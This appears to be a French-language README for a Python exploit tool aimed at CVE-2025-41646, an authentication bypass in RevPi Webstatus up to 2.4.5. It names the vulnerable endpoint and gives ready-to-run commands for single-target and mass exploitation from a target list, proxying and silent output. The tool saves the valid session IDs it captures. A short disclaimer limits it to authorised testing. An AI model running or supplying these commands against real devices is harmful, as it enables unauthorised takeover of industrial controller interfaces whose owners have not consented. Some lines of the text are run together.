
Script d'exploitation Python pour CVE-2025-41646, un contournement d'authentification dans RevPi Webstatus <= 2.4.5. Prend en charge l'exploitation individuelle/massive, proxy, mode silencieux et sortie JSON pour les tests de pénétration.
Ceci est un script d'exploit Python3 pour CVE-2025-41646, une vulnérabilité de contournement d'authentification affectant RevPi Webstatus <= 2.4.5.
/php/dal.phppip install -r requirements.txt
requests
urllib3 (généralement inclus avec requests)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
requête/réponse
Cet outil est destiné uniquement à des fins éducatives et de tests de pénétration autorisés.
Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale.
| Option | Description |
|---|
-u, --url | URL cible (ex. http://IP) |
-l, --list | Fichier contenant une liste de cibles |
-o, --output | Fichier de sortie pour sauvegarder les IDs de session valides |
--proxy | Utiliser un proxy (http://127.0.0.1:8080) |
--json | Afficher la sortie JSON brute |
--silent | Mode silencieux (affiche uniquement l'ID de session) |